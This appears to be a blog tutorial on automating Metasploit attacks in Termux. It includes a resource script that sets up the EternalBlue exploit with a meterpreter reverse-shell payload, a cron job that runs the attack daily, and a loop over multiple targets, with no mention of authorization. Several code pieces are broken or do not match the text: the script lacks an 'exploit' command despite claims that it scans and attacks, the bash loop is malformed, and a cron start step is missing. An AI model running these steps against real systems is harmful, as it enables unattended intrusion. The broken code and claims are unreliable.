Automating Exploits in Metasploit Software: Scripting Attacks in Termux


Automating exploits in Metasploit software can greatly enhance your penetration testing process. When manually executing exploits, it can be tedious to input repetitive commands, especially if you’re targeting multiple systems or running complex attack chains. Automating these actions through scripting allows you to streamline the entire process, making penetration testing faster and more efficient. By leveraging the powerful scripting capabilities of Termux, you can set up Metasploit software to run attack sequences on demand or at scheduled intervals.

This guide will show you how to automate exploits in Metasploit software using resource scripts in Termux. These scripts can execute commands such as scanning targets, launching exploits, and even performing post-exploitation tasks with minimal human intervention. Whether you are managing multiple hosts or conducting repetitive tasks, automating Metasploit software will save time, increase accuracy, and reduce human error in your security assessments. Additionally, we will explore how to schedule these attacks using Cron jobs, further enhancing your workflow.

Table of Contents

Why Automate Exploits in Metasploit Software?

Metasploit software is one of the most powerful tools for penetration testing, but manually running exploits can be time-consuming, especially when dealing with multiple targets or complex attack chains. Automating these processes allows you to:

  • Save Time: Automating repetitive tasks reduces the time spent on manual execution.
  • Increase Efficiency: Run multiple exploits or tests on different hosts simultaneously.
  • Reduce Human Error: Automation minimizes mistakes that might occur during manual operations.

Scripting attacks in Metasploit software helps you leverage its full capabilities by allowing you to execute customized attack sequences automatically. For more detailed guidance on enhancing Metasploit software performance, check out our article on Setting Up a Metasploit Database in Termux.


Before you begin, ensure that you have the following:

  • Termux installed on your Android device.
  • Metasploit software installed in Termux.
  • A basic understanding of Metasploit commands and scripting.

For additional information on Termux installations, refer to this guide from the official Termux wiki.

Step-by-Step Guide to Automating Exploits in Metasploit Software

Step 1: Install Metasploit Software and Termux Scripting Tools

First, make sure you have Metasploit software and essential scripting tools installed in Termux.

pkg update && pkg upgrade
pkg install unstable-repo
pkg install metasploit
pkg install nano

Metasploit software uses .rc (resource) files to automate commands. You’ll use these files to script attacks. If you need help installing Metasploit software, refer to the official Metasploit installation guide.

Step 2: Create a Resource Script

A resource script contains a series of Metasploit commands that can be executed automatically. Let’s create a basic script that scans a target and launches an exploit.

  1. Open a text editor in Termux:
nano attack_script.rc
  1. Add the following commands to automate a scan and exploit:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <your_ip>
  1. Save and close the file by pressing CTRL + X, then Y to confirm.

This script uses the EternalBlue exploit (MS17-010) to attack a target machine. You can modify the script to include different targets and exploits as needed. If you are interested in other ways to optimize your Metasploit environment, read Tips for Securing Your Termux Environment.

Step 3: Automate the Attack

To execute the script and automate the attack, run the following command in Termux:

msfconsole -r attack_script.rc

Metasploit software will automatically execute the commands in the script, including setting the target, loading the exploit, and launching the attack. This eliminates the need to input commands manually, streamlining your exploitation process.

For more information on using resource scripts, visit the Metasploit documentation on automation.

Step 4: Schedule Automated Attacks with Cron

You can further automate the execution of Metasploit software scripts by scheduling them using Cron jobs in Termux. This allows you to run exploits at specific intervals without manual input.

  1. Install Cron in Termux:
pkg install cronie
  1. Start the Cron service:
  1. Edit your Cron jobs file:
crontab -e
  1. Add a new job to run the Metasploit software script every day at 2:00 AM:
0 2 * * * msfconsole -r /path/to/attack_script.rc

This setup will automatically execute your script at the specified time, allowing you to run attacks on a schedule. To learn more about scheduling tasks with Cron, check out our guide on Using Cron Jobs in Termux.

Step 5: Advanced Scripting Techniques

To take automation further, you can create more complex scripts that:

  • Loop through multiple targets: Use a loop to scan and exploit multiple IPs.
  • Perform post-exploitation tasks: Automate file uploads, system commands, or privilege escalation techniques after the exploit is successful.
  • Generate reports: Output the results of the exploitation into a log file for review.

Here’s an example of looping through multiple targets:

targets=("" "" "")
for target in "${targets[@]}"
    msfconsole -r attack_script_$target.rc

This script iterates through the IP addresses in the targets array and runs a separate resource script for each target.


By automating exploits with Metasploit software in Termux, you can save time, increase efficiency, and reduce human error during penetration testing. Using resource scripts and scheduling with Cron, you can streamline repetitive tasks and focus on more complex elements of your security assessments. For additional network scanning techniques in Termux, check out our article on Performing Basic Network Scans with Nmap in Termux.

Automation in Metasploit software allows you to exploit vulnerabilities faster and more efficiently, making it an essential skill for any penetration tester.

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